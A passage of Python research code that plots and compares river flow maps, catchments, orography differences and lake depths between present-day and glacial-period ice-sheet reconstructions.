+ data_label + "_updated.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_"
"post_processing_20160427_141158.nc",
data_catchment_filename="catchmentmap_ICE5G_and_tarasov_upscaled_"
"srtm30plus_north_america_only_data_ALG4_sinkless_downscaled_ls_"
"mask_0k_upscale_rdirs_" + data_label + "_updated.nc",
ref_rdirs_filename="rivdir_vs_1_9_data_from_stefan.nc",
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
corrected_hd_rdirs_rmouthoutflow_file,
data_rmouth_outflows_filename=\
upscaled_rdirs_rmouthoutflow_file,
lsmask_filename=lsmask_filename,
minflowcutoff=100,flip_data=False,
rotate_data=True,flip_ref=False,rotate_ref=False,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=False,
first_datasource_name="Reference",
matching_parameter_set='extensive',
rivers_to_plot=[(117,424),(121,176),(179,260),
(160,573),(40,90),(217,432),
(104,598),(46,504),(252,638),
(32,612),(132,494),(171,371),
(50,439),(121,456),(40,682),
(88,430)],
rivers_to_plot_alt_color=[(192,384),(82,223),
(249,244),(117,603),
(35,521),(144,548),
(72,641),(54,29),
(88,457),(62,173),
(91,111),(125,165),
(159,235),(237,392),
(36,660),(51,717),
(33,603),(90,418),
(89,482),(111,380)],
rivers_to_plot_secondary_alt_color=[(64,175),
(42,468),
(32,577),
(43,508),
(117,130),
(230,427),
(36,631),
(86,436),
(55,174),
(82,113),
(60,416),
(154,388),
(136,536),
(201,286)],
use_single_color_for_discrepancies=True,
catchment_and_outflows_mods_list_filename=\
"catch_and_outflow_mods_ice5g_10min_upscaled_"
"rdirs_vs_modern_day.txt",
second_datasource_name="Data",grid_type='HD')
def Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_glcc_olson_lsmask_0k_FlowMap_comparison(self):
data_label="20170517_004128"
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_data_ALG4_sinkless'
'_glcc_olson_lsmask_0k_upscale_rdirs_' + data_label + '_updated.nc')
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_recreate_connected_HD_lsmask_"
"from_glcc_olson_data_20170513_195421.nc")
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only"
"_data_ALG4_sinkless_glcc_olson_lsmask_0k_upscale_rdirs_"
+ data_label + "_updated.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_"
"post_processing_20160427_141158.nc",
data_catchment_filename="catchmentmap_ICE5G_and_tarasov_upscaled_"
"srtm30plus_north_america_only_data_ALG4_sinkless_glcc"
"_olson_lsmask_0k_upscale_rdirs_" + data_label + "_updated.nc",
ref_rdirs_filename="rivdir_vs_1_9_data_from_stefan.nc",
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
corrected_hd_rdirs_rmouthoutflow_file,
data_rmouth_outflows_filename=\
upscaled_rdirs_rmouthoutflow_file,
lsmask_filename=lsmask_filename,
minflowcutoff=100,flip_data=False,
rotate_data=True,flip_ref=False,rotate_ref=False,
lsmask_has_same_orientation_as_ref=False,
flip_lsmask=False,rotate_lsmask=True,
invert_ls_mask=False,
first_datasource_name="Reference",
matching_parameter_set='magnitude_extensive',
additional_truesink_matches_list_filename=\
"additional_truesink_matches_ice5g_upscaled_"
"present_with_glcc_lsmask_vs_manual_HD_rdirs.txt",
rivers_to_plot=[(117,424),(121,176),(179,260),
(160,573),(40,90),(217,432),
(104,598),(46,504),(252,638),
(32,612),(132,494),(171,371),
(50,439),(121,456),(40,682),
(88,430)],
rivers_to_plot_alt_color=[(192,384),(82,223),
(249,244),(117,603),
(35,521),(144,548),
(72,641),(54,29),
(88,457),(62,173),
(91,111),(125,165),
(159,235),(237,392),
(36,660),(51,717),
(33,603),(90,418),
(89,482),(111,380)],
rivers_to_plot_secondary_alt_color=[(64,175),
(42,468),
(32,577),
(43,508),
(117,130),
(230,427),
(36,631),
(86,436),
(55,174),
(82,113),
(60,416),
(154,388),
(136,536),
(201,286)],
use_single_color_for_discrepancies=True,
catchment_and_outflows_mods_list_filename=\
"catch_and_outflow_mods_ice5g_10min_upscaled_"
"rdirs_vs_modern_day_glcc_olson_lsmask.txt",
second_datasource_name="Data",grid_type='HD')
def compare_present_day_and_lgm_river_directions_with_catchments_ICE5G_plus_tarasov_style_orog_corrs_for_both(self):
"""Compare LGM to present using ICE5G data plus tarasov style orography corrections for both times"""
present_day_data_datetime = "20170521_002051"
lgm_data_datetime = "20170521_151723"
ref_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ICE5G_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_tarasov"
"_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
format(present_day_data_datetime))
data_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
"tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
format(lgm_data_datetime))
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
"_tarasov_orog_corrs_generation_and_upscaling_{0}_HD_transf.dat".\
format(lgm_data_datetime))
ref_catchment_filename=("catchmentmap_ICE5G_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
"tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
format(present_day_data_datetime))
data_catchment_filename=("catchmentmap_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
"_tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
format(lgm_data_datetime))
ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ICE5G_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_"
"plus_upscale_rdirs_tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_"
"updated_transf.dat".format(present_day_data_datetime))
reference_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_0k_ALG4_sinkless_no_true_sinks_oceans_"
"lsmask_plus_upscale_rdirs_tarasov_orog_corrs"
"_generation_and_upscaling_{0}_upscaled_updated.nc".\
format(present_day_data_datetime))
data_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_"
"lsmask_plus_upscale_rdirs_tarasov_orog_corrs_"
"generation_and_upscaling_{0}_upscaled_updated.nc".\
format(lgm_data_datetime))
glacier_mask_filename=os.path.join(self.orog_data_directory,"ice5g_v1_2_21_0k_10min.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
ref_catchment_filename,
data_catchment_filename=\
data_catchment_filename,
ref_rdirs_filename=\
ref_rdirs_filename,
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename=\
data_rmouth_outflows_filename,
lsmask_filename=lsmask_filename,
minflowcutoff=100,
flip_data=False,
rotate_data=True,
flip_ref=False,
rotate_ref=True,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=True,
first_datasource_name="Present day",
second_datasource_name="LGM",
matching_parameter_set='extensive',
catchment_and_outflows_mods_list_filename=\
"catch_and_outflow_mods_lgm_vs_present_day.txt",
additional_matches_list_filename=\
"additional_matches_10min_upscaled_lgm_vs_present.txt",
use_single_color_for_discrepancies=True,
use_only_one_color_for_flowmap=False,
use_title=False,remove_antartica=True,
difference_in_catchment_label="Difference",
glacier_mask_filename=glacier_mask_filename,
glacier_mask_grid_type='LatLong10min',
flip_glacier_mask=True,
rotate_glacier_mask=True,
grid_type='HD')
def compare_present_day_and_lgm_river_directions_with_catchments_ICE6G_plus_tarasov_style_orog_corrs_for_both(self):
"""Compare LGM to present using ICE6G data plus tarasov style orography corrections for both times"""
present_day_data_datetime = "20170612_202721"
lgm_data_datetime = "20170612_202559"
ref_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ICE6g_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_tarasov"
"_orog_corrs_{0}_upscaled_updated.nc".\
format(present_day_data_datetime))
data_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
"tarasov_orog_corrs_{0}_upscaled_updated.nc".\
format(lgm_data_datetime))
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
"_tarasov_orog_corrs_{0}_HD_transf.nc".\
format(lgm_data_datetime))
extra_lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_ICE6g_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale"
"_rdirs_tarasov_orog_corrs_{0}_HD_transf.nc".\
format(present_day_data_datetime))
ref_catchment_filename=("catchmentmap_ICE6g_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
"tarasov_orog_corrs_{0}_upscaled_updated.nc".\
format(present_day_data_datetime))
data_catchment_filename=("catchmentmap_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
"_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
format(lgm_data_datetime))
ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ICE6g_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_"
"plus_upscale_rdirs_tarasov_orog_corrs_{0}_upscaled_"
"updated.nc".format(present_day_data_datetime))
reference_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE6g_0k_ALG4_sinkless_no_true_sinks_oceans_"
"lsmask_plus_upscale_rdirs_tarasov_orog_corrs"
"_{0}_upscaled_updated.nc".\
format(present_day_data_datetime))
data_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_"
"lsmask_plus_upscale_rdirs_tarasov_orog_corrs_"
"{0}_upscaled_updated.nc".\
format(lgm_data_datetime))
glacier_mask_filename=os.path.join(self.orog_data_directory,"Ice6g_c_VM5a_10min_21k.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
ref_catchment_filename,
data_catchment_filename=\
data_catchment_filename,
ref_rdirs_filename=\
ref_rdirs_filename,
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename=\
data_rmouth_outflows_filename,
lsmask_filename=lsmask_filename,
minflowcutoff=75,
flip_data=False,
rotate_data=True,
flip_ref=False,
rotate_ref=True,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=True,
first_datasource_name="Present day",
second_datasource_name="LGM",
matching_parameter_set='extensive',
catchment_and_outflows_mods_list_filename=\
"ice6g_catch_and_outflow_mods_lgm_vs_present_day.txt",
additional_matches_list_filename=\
"ice6g_additional_matches_10min_upscaled_lgm_vs_present.txt",
use_single_color_for_discrepancies=True,
use_only_one_color_for_flowmap=False,
use_title=False,remove_antartica=True,
difference_in_catchment_label="Difference",
rivers_to_plot=[(216,433),(117,424),(112,380),(146,327),
(132,496),(120,176),(251,638),(115,603),
(33,571),(34,571),(36,660),(181,256),
(120,457),(77,365),(258,235),(167,361),
(219,598)],
rivers_to_plot_alt_color=[(237,393),(192,384),(169,371),
(119,399),(72,640),(126,165),
(87,112),(88,419),(160,237),
(60,35),(147,552),(245,635),
(86,460),(33,603),
(247,243),(41,682),(185,276),
(147,522),(244,612)],
rivers_to_plot_secondary_alt_color=[(230,427),(170,376),
(180,446),(143,327),
(201,287),(136,538),
(100,467),(116,130),
(160,572),(32,614),
(50,712),(210,619),
(179,445),(212,384),
(261,230),(85,438)],
glacier_mask_filename=glacier_mask_filename,
extra_lsmask_filename=extra_lsmask_filename,
glacier_mask_grid_type='LatLong10min',
flip_glacier_mask=True,
rotate_glacier_mask=True,
grid_type='HD')
def compare_ICE5G_and_ICE6G_with_catchments_tarasov_style_orog_corrs_for_both(self):
"""Compare LGM to present using ICE6G data plus tarasov style orography corrections for both times"""
ice5g_datetime = "20170615_174943"
ice6g_datetime = "20170612_202559"
ref_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_tarasov"
"_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
format(ice5g_datetime))
data_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
"tarasov_orog_corrs_{0}_upscaled_updated.nc".\
format(ice6g_datetime))
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
"_tarasov_orog_corrs_{0}_HD_transf.nc".\
format(ice6g_datetime))
ref_catchment_filename=("catchmentmap_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
"tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
format(ice5g_datetime))
data_catchment_filename=("catchmentmap_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
"_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
format(ice6g_datetime))
ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_"
"plus_upscale_rdirs_tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_"
"updated.nc".format(ice5g_datetime))
reference_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_"
"lsmask_plus_upscale_rdirs_tarasov_orog_corrs"
"_generation_and_upscaling_{0}_upscaled_updated.nc".\
format(ice5g_datetime))
data_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_"
"plus_upscale_rdirs_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
format(ice6g_datetime))
#glacier_mask_filename=os.path.join(self.orog_data_directory,"ice5g_v1_2_21_0k_10min.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
ref_catchment_filename,
data_catchment_filename=\
data_catchment_filename,
ref_rdirs_filename=\
ref_rdirs_filename,
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename=\
data_rmouth_outflows_filename,
lsmask_filename=lsmask_filename,
minflowcutoff=100,
flip_data=False,
rotate_data=True,
flip_ref=False,
rotate_ref=True,
lsmask_has_same_orientation_as_ref=False,
flip_lsmask=False,rotate_lsmask=False,
invert_ls_mask=True,
first_datasource_name="ICE5G",
second_datasource_name="ICE6G",
matching_parameter_set='extensive',
catchment_and_outflows_mods_list_filename=\
"catch_and_outflow_mods_ice6g_vs_ice5g_lgm.txt",
#additional_matches_list_filename=\
#"additional_matches_ice6g_vs_ice5g_lgm.txt",
use_single_color_for_discrepancies=True,
use_only_one_color_for_flowmap=False,
use_title=False,remove_antartica=True,
difference_in_catchment_label="Difference",
rivers_to_plot=[(216,434),(116,426),(111,385),
(127,473),(71,641),(123,175),
(147,327),(146,554),(194,590),
(25,605),(26,691),(69,31),
(178,267),(88,455),(67,369),
(253,637),(204,609),(270,238),
(39,315),(42,252),
(16,444),(56,232)],
rivers_to_plot_alt_color=[(193,383),(237,392),(170,369),
(118,398),(24,591),(114,612),
(126,167),(87,111),(88,246),
(160,240),(249,255),(91,421),
(197,626),(217,598),(135,496),
(31,112),(14,263),(54,2)],
rivers_to_plot_secondary_alt_color=[(230,428),(171,377),
(154,446),(100,467),
(142,327),(180,445),
(170,578),(117,131),
(24,622),(34,8),
(75,99),(201,287),
(90,433),(250,632),
(82,349),(138,536),
(29,392),(32,200),
(35,104),(261,246),
(14,320)],
grid_type='HD')
class OrographyPlots(Plots):
"""A general base class for orography plots"""
orography_path_extension = 'orographys'
def __init__(self,save,color_palette_to_use='default'):
"""Class constructor"""
super(OrographyPlots,self).__init__(save,color_palette_to_use)
self.orography_data_directory = os.path.join(self.hd_data_path,self.orography_path_extension)
class SimpleOrographyPlots(OrographyPlots):
def __init__(self,save,color_palette_to_use='default'):
"""Class constructor."""
super(SimpleOrographyPlots,self).__init__(save,color_palette_to_use)
def SimpleArrayPlotHelper(self,filename):
"""Assists the creation of simple array plots"""
#levels = np.linspace(-100.0, 9900.0, 100, endpoint=True)
plt.figure()
#plt.contourf(orography_field,levels)
plt.colorbar()
pts.invert_y_axis()
class Ice5GComparisonPlots(OrographyPlots):
"""Handles generation Ice5G data comparison plots"""
def __init__(self,save,use_old_data=False,color_palette_to_use='default'):
"""Class constructor. Sets filename (to point to either old or new data)"""
super(Ice5GComparisonPlots,self).__init__(save,color_palette_to_use)
print("Comparing the Modern and LGM Ice-5G 5-minute resolution orography datasets")
if use_old_data:
#The data Uwe gave me; this is possibly an older version
modern_ice_5g_filename = self.orography_data_directory +"/ice5g_0k_5min.nc"
lgm_ice_5g_filename = self.orography_data_directory + "/ice5g_21k_5min.nc"
modern_ice_5g_field = iohlpr.NetCDF4FileIOHelper.load_field(modern_ice_5g_filename, 'LatLong5min')
lgm_ice_5g_field = iohlpr.NetCDF4FileIOHelper.load_field(lgm_ice_5g_filename, 'LatLong5min')
else:
#The latest version of the data from the ICE5G website
modern_ice_5g_filename = self.orography_data_directory +"/ice5g_v1_2_00_0k_10min.nc"
lgm_ice_5g_filename = self.orography_data_directory + "/ice5g_v1_2_21_0k_10min.nc"
modern_ice_5g_field = iohlpr.NetCDF4FileIOHelper.load_field(modern_ice_5g_filename, 'LatLong10min')
lgm_ice_5g_field = iohlpr.NetCDF4FileIOHelper.load_field(lgm_ice_5g_filename, 'LatLong10min')
self.difference_in_ice_5g_orography = lgm_ice_5g_field - modern_ice_5g_field
if use_old_data:
#Remove antartica
self.difference_in_ice_5g_orography = self.difference_in_ice_5g_orography[275:,:]
def plotLine(self):
"""Contour plot comparing the Modern and LGM Ice-5G 5-minute resolution orography datasets"""
minc = 0
maxc = 500
num = 500
levels = np.linspace(minc,maxc,num+1)
title = textwrap.dedent("""\
Orography difference between LGM and Modern ICE-5G data
using {0} meter contour interval""").format((maxc-minc)/num)
plt.figure()
plt.contour(self.difference_in_ice_5g_orography,levels=levels)
plt.title(title)
pts.remove_ticks()
#if self.save:
#plt.savefig('something')
print("Line contour plot created")
def plotFilled(self):
"""Filled contour plot comparing the Modern and LGM Ice-5G 5-minute resolution orography datasets"""
minc = 70
maxc = 120
num = 25
levels = np.linspace(minc,maxc,num+1)
title = "Orography difference between LGM and Modern ICE-5G data"
plt.figure()
plt.contourf(self.difference_in_ice_5g_orography,levels=levels)
plt.title(title)
pts.remove_ticks()
cbar = plt.colorbar()
cbar.ax.set_ylabel('Orography difference in meters')
#if self.save:
#plt.savefig('something')
print("Filled contour plot created")
def plotCombined(self):
"""Basic combined plot"""
self.CombinedPlotHelper()
def plotCombinedIncludingOceanFloors(self):
"""Combined plot with extended range of levels to include the ocean floor"""
self.CombinedPlotHelper(minc=70,maxc=170,num=50)
def CombinedPlotHelper(self,minc=70,maxc=120,num=25):
"""Combined filled and line contour plots of orography difference between LGM and Modern ICE-5G data"""
levels = np.linspace(minc,maxc,num+1)
title = textwrap.dedent("""\
Orography difference between LGM and Modern ICE-5G data
using {0} meter contour interval""").format((maxc-minc)/num)
plt.figure()
ax = plt.subplot(111)
contourset = plt.contourf(self.difference_in_ice_5g_orography,
levels=levels,hold=True)
cbar = plt.colorbar()
cbar.ax.set_ylabel('Orography difference in meters')
plt.contour(self.difference_in_ice_5g_orography,levels=contourset.levels,
colors='black',hold=True)
ufcntr = plt.contourf(self.difference_in_ice_5g_orography,
levels=[np.min(self.difference_in_ice_5g_orography),minc],
colors='white',
hatches=['/'],hold=True)
ofcntr = plt.contourf(self.difference_in_ice_5g_orography,
levels=[maxc,np.max(self.difference_in_ice_5g_orography)],
colors='white',
hatches=['\\'],hold=True)
ufartists,uflabels = ufcntr.legend_elements() #@UnusedVariable
ofartists,oflabels = ofcntr.legend_elements() #@UnusedVariable
uflabels=['Difference $\\leq {0}$'.format(minc)]
oflabels=['${0} <$ Difference'.format(maxc)]
artists = ufartists + ofartists
labels = uflabels + oflabels
plt.title(title)
pts.remove_ticks()
axbounds = ax.get_position()
#Shrink box by 5%
ax.set_position([axbounds.x0,axbounds.y0 + axbounds.height*0.05,
axbounds.width,axbounds.height*0.95])
ax.legend(artists,labels,loc='upper center',
bbox_to_anchor=(0.5,-0.025),fancybox=True,ncol=2)
#if self.save:
#plt.savefig('something')
print("Combined plot created")
class LakePlots(Plots):
ls_masks_extension = 'lsmasks'
basin_catchment_nums_extension = "basin_catchment_numbers"
glacier_data_extension= 'orographys'
def __init__(self,save=False,color_palette_to_use='default'):
self.ls_masks_data_directory= os.path.join(self.hd_data_path,
self.ls_masks_extension)
self.basin_catchment_nums_directory = os.path.join(self.hd_data_path,
self.basin_catchment_nums_extension)
self.glacier_data_directory = os.path.join(self.hd_data_path,
self.glacier_data_extension)
def plotLakeDepth(self,ax,timeslice):
timestamps = {1850:"20190211_131542",
1800:"20190211_131517",
1750:"20190211_131429",
1700:"20190211_131345",
1650:"20190211_131301",
1600:"20190211_131212",
1550:"20190211_131126",
1500:"20190211_131041",
1450:"20190211_130957",
1400:"20190211_130918"}
times = {1850:7500,
1800:8000,
1750:8500,
1700:9000,
1650:9500,
1600:10000,
1550:10500,
1500:11000,
1450:11500,
1400:12000}
depth = \
iodriver.advanced_field_loader(filename=
"/Users/thomasriddick/Downloads/updated_orog_{}_lake_"
"basins_prepare_orography_{}.nc".format(timeslice,timestamps[timeslice]),
time_slice=None,
fieldname="depth",
adjust_orientation=True)
lsmask = field.Field(iohlpr.NetCDF4FileIOHelper.
load_field("/Users/thomasriddick/Documents/data/HDdata/lsmasks/10min_lsmask_pmu0178_merged.nc",
grid_type='LatLong10min',
timeslice=timeslice),grid='LatLong10min')
lsmask.rotate_field_by_a_hundred_and_eighty_degrees()
lsmask.flip_data_ud()
depth.flip_data_ud()
depth_masked = np.ma.MaskedArray(data=depth.get_data(),
mask=lsmask.get_data())
ax.set_title("{} BP".format(times[timeslice]))
cs = ax.contourf(depth_masked[800:-170,450:650],
levels=np.linspace(0,700,25),
cmap="Blues")
ax.set_xticks(np.array([90]))
ax.set_xticklabels(["90$^{\circ}$ E"])
ax.set_yticks(np.array([10]))
ax.set_yticklabels(["45$^{\circ}$ N"])
return cs
def plotLakeDepths(self):
fig = plt.figure(figsize=(18, 6))
gs = gridspec.GridSpec(3, 2,height_ratios=[4,4, 1])
ax1 = plt.subplot(gs[0, 0])
ax2 = plt.subplot(gs[0, 1])
ax3 = plt.subplot(gs[1, 0])
ax4 = plt.subplot(gs[1, 1])
ax_cb = plt.subplot(gs[2, :])
self.plotLakeDepth(ax1,1450)
self.plotLakeDepth(ax2,1550)
self.plotLakeDepth(ax3,1650)
cs = self.plotLakeDepth(ax4,1750)
fig.colorbar(cs,cax=ax_cb,orientation="horizontal")
adddaf_cb.set_xlabel("Potential Lake Depth (m)")
fig.tight_layout()
def TwoColourRiverAndLakePlotHelper(self,river_flow_filename,
lsmask_filename,
basin_catchment_num_filename,
lake_data_filename,
glacier_data_filename,
flip_river_data=False,
flip_mask=False,
flip_catchment_nums=False,
flip_lake_data=False,
flip_glacier_mask=False,
rotate_lsmask=False,
rotate_catchment_nums=False,
rotate_lake_data=False,
rotate_glacier_mask=False,
minflowcutoff=1000000000000.0,
lake_grid_type='LatLong10min',
lake_kwargs={},
river_grid_type='HD',**river_kwargs):
"""Help produce a map of river flow, lakes and potential lakes"""
river_flow_object = iodriver.load_field(river_flow_filename,
file_type=iodriver.\
get_file_extension(river_flow_filename),
field_type='Generic',
grid_type=river_grid_type,**river_kwargs)
lsmask_field = iodriver.load_field(lsmask_filename,
file_type=iodriver.get_file_extension(lsmask_filename),
field_type='Generic',grid_type=lake_grid_type,
**lake_kwargs)
basin_catchment_nums_field = iodriver.load_field(basin_catchment_num_filename,
file_type=iodriver.\
get_file_extension\
(basin_catchment_num_filename),
field_type='Generic',
grid_type=lake_grid_type,
**lake_kwargs)
lake_data_field = iodriver.load_field(lake_data_filename,
file_type=iodriver.\
get_file_extension(lake_data_filename),
field_type='Generic',
grid_type=lake_grid_type,
**lake_kwargs)
glacier_mask_field = iodriver.load_field(glacier_data_filename,
file_type=iodriver.\
get_file_extension(glacier_data_filename),
fieldname="ICEM",
field_type='Generic',
grid_type=lake_grid_type,
**lake_kwargs)
if flip_river_data:
river_flow_object.flip_data_ud()
if flip_mask:
lsmask_field.flip_data_ud()
if flip_catchment_nums:
basin_catchment_nums_field.flip_data_ud()
if flip_lake_data:
lake_data_field.flip_data_ud()
if flip_glacier_mask:
glacier_mask_field.flip_data_ud()
if rotate_catchment_nums:
basin_catchment_nums_field.rotate_field_by_a_hundred_and_eighty_degrees()
if rotate_lake_data:
lake_data_field.rotate_field_by_a_hundred_and_eighty_degrees()
if rotate_lsmask:
lsmask_field.rotate_field_by_a_hundred_and_eighty_degrees()
if rotate_glacier_mask:
glacier_mask_field.rotate_field_by_a_hundred_and_eighty_degrees()
lsmask = lsmask_field.get_data()
basin_catchment_nums = basin_catchment_nums_field.get_data()
river_flow = river_flow_object.get_data()
rivers_and_lakes_field = copy.deepcopy(river_flow_object)
rivers_and_lakes = rivers_and_lakes_field.get_data()
lake_data = lake_data_field.get_data()
glacier_mask = glacier_mask_field.get_data()
plt.figure()
plt.subplot(111)
rivers_and_lakes[river_flow < minflowcutoff] = 1
rivers_and_lakes[river_flow >= minflowcutoff] = 2
fine_rivers_and_lakes_field = utilities.downscale_ls_mask(rivers_and_lakes_field,
lake_grid_type,
**lake_kwargs)
fine_rivers_and_lakes = fine_rivers_and_lakes_field.get_data()
fine_rivers_and_lakes[basin_catchment_nums > 0 ] = 3
fine_rivers_and_lakes[lake_data > 0] = 4
fine_rivers_and_lakes[glacier_mask == 1] = 5
fine_rivers_and_lakes[lsmask == 1] = 0
cmap = mpl.colors.ListedColormap(['blue','peru','black','green','red','white'])
bounds = list(range(7))
norm = mpl.colors.BoundaryNorm(bounds,cmap.N)
plt.imshow(fine_rivers_and_lakes,cmap=cmap,norm=norm,interpolation="none")
plt.title('Cells with cumulative flow greater than or equal to {0}'.format(minflowcutoff))
def TwoColourRiverAndLakeAnimationHelper(self,
river_flow_file_basename,
lsmask_file_basename,
basin_catchment_num_file_basename,
lake_data_file_basename,
glacier_data_file_basename,
river_flow_fieldname,
lsmask_fieldname,
basin_catchment_num_fieldname,
lake_data_fieldname,
glacier_fieldname,
catchment_nums_file_basename=None,
catchment_nums_fieldname=None,
rdirs_file_basename=None,
rdirs_fieldname=None,
minflowcutoff=1000000000000.0,
zoomed=False,
zoom_section_bounds={}):
"""Help produce a map of river flow, lakes and potential lakes"""
fig = plt.figure()
plt.subplot(111)
cmap = mpl.colors.ListedColormap(['darkblue','peru','black','cyan','blue','white','purple','darkred','slategray'])
bounds = list(range(10))
norm = mpl.colors.BoundaryNorm(bounds,cmap.N)
plt.title('Lakes and rivers with flow greater than {0} m3/s'.format(minflowcutoff))
ims = []
#show_slices = [14600,13500,12800,12330,11500,11300]
show_slices = [15990]
for time in range(15990,11000,-10):
mpiesm_time = 3000 + 16000 - time
show_snapshot = True if time in show_slices else False
date_text = fig.text(0.4,0.075,"{} YBP".format(time))
ims.append([self.TwoColourRiverAndLakeAnimationHelperSliceGenerator(cmap=cmap,norm=norm,
river_flow_filename=
river_flow_file_basename.replace("DATETIME",str(mpiesm_time)),
lsmask_filename=
lsmask_file_basename.replace("DATETIME",str(time)),
basin_catchment_num_filename=
basin_catchment_num_file_basename.replace("DATETIME",str(time)),
lake_data_filename=
lake_data_file_basename.replace("DATETIME",str(mpiesm_time)),
glacier_data_filename=
glacier_data_file_basename.replace("DATETIME",str(time)),
river_flow_fieldname=river_flow_fieldname,
lsmask_fieldname=lsmask_fieldname,
basin_catchment_num_fieldname=
basin_catchment_num_fieldname,
lake_data_fieldname=
lake_data_fieldname,
glacier_fieldname=
glacier_fieldname,
catchment_nums_filename=
catchment_nums_file_basename.replace("DATETIME",str(time)) if
catchment_nums_file_basename is not None else None,
catchment_nums_fieldname=
catchment_nums_fieldname,
rdirs_filename=
